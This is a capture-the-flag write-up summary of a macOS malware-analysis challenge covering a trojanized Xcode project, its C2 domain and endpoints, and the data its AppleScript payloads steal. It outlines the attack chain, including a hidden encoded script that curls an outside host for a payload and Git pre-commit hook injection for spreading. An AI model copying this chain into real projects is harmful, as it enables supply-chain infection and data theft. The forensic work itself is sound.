365 words
2 minutes
Arctic Howl - Week 1 First Tracks
2026-04-02
Events
events
/
offsec
/
arctic-howl
/
season-2
/
week-1
/
malware-analysis

Arctic Howl - Week 1 First Tracks#

Quick Navigation#

README#

Week 1 - First Tracks

WEEK 1 First Tracks#

OffSec Arctic Howl Tundra Realm Season 2#

Challenge Overview#

FieldDetails
StatusCOMPLETED
CategoryMalware Analysis PCAP Forensics Incident Response
DifficultyEasy
EventArctic Howl: The Cascade Expanse Season 2
Score40 / 40

Scenario#

At the Cascade Law Archive, the IT department detected a sudden cold spike in outbound network traffic shortly after onboarding a new developer. While the firm primarily operates on Windows systems, the new hire requested a Mac laptop. The developer reports no intentional software downloads, but confirms cloning a starter Xcode project from an internal Git repository as part of onboarding.

File Provided: capture.pcap (ZIP password: 3531e680028eb73989f3a3b2ce129241)

Questions#

#Question
1What URL did the malware download the first stage from? What user-agent sent the request?
2How does the C2 server obfuscate its payloads?
3Analyze the looz payload. What information does it extract from the victim machine?
4Analyze the cozfi_xhh payload. What information does it extract from the victim machine?
5How does the malware attempt to infect other devices? Which payload is responsible?
6What file contained the initial malware? How is the initial payload obfuscated?

Key Skills#

  • PCAP analysis (Wireshark / tshark)
  • Multi-layer encoding reversal (triple hex, 7 Base64)
  • AppleScript malware analysis
  • Mac forensics and macOS artifact locations
  • Git hook injection detection
  • C2 infrastructure mapping
  • Supply chain attack investigation
  • IOC extraction and detection rule authoring (YARA, Sigma, Snort)

Key Findings#

QuestionAnswer
Q1 Initial Downloadhttp://bu1knames.io/a via curl/8.7.1
Q2 Obfuscation7 nested Base64 in AppleScript payloads
Q3 looz PayloadExfiltrates browser, macOS version, Safari version, locale, firewall status, SIP status, CPU info POST to /i
Q4 cozfi_xhhExfiltrates Apple Notes + Reminders, serial number ZIP upload to /n?s=<serial>
Q5 Propagationjez payload injects malicious pre-commit hooks into all local Git repos
Q6 Initial Filexcassets.sh hidden in .xcodeproj/xcuserdata/.xcassets/ triple hex encoded

Attack Chain#

Developer clones trojanized Xcode project


xcassets.sh executes (triple hex  curl bu1knames.io/a)


C2 delivers 7 Base64 encoded AppleScript payloads


looz: System profiling  POST /i
seizecj: Secondary profiling
cozfi_xhh: Apple Notes + Reminders theft  POST /n
txzx_vostfdi: Persistence
jez: Git pre-commit hook injection (propagation)


Infection spreads to all local repos  shared with other developers

C2 Infrastructure#

Domain: bu1knames.io Protocol: HTTP Port: 80

EndpointPurpose
/aInitial beacon + payload download
/lEnvironment data
/s/<name>Payload distribution
/iSystem info exfiltration
/nNotes/Reminders upload

Files#

FileDescription
INVESTIGATION_REPORT.mdFull forensic analysis + all 6 question solutions

Tools Used#

Wireshark tshark xxd base64 Python 3 Kali Linux VM grep/sed/awk

Writeup completed: March 4, 2026 OffSec Arctic Howl Season 2 Score: 6/6 correct

Arctic Howl - Week 1 First Tracks
https://ctf-writeups-webb.vercel.app/posts/events-season2-week1-first-tracks/
Author
Umair Aziz
Published at
2026-04-02
License
CC BY-NC-SA 4.0
Arctic Howl - Week 0 Tutorial Challenge
Arctic Howl - Week 2 Expanse Surveyor
© 2026 Umair Aziz. All Rights Reserved.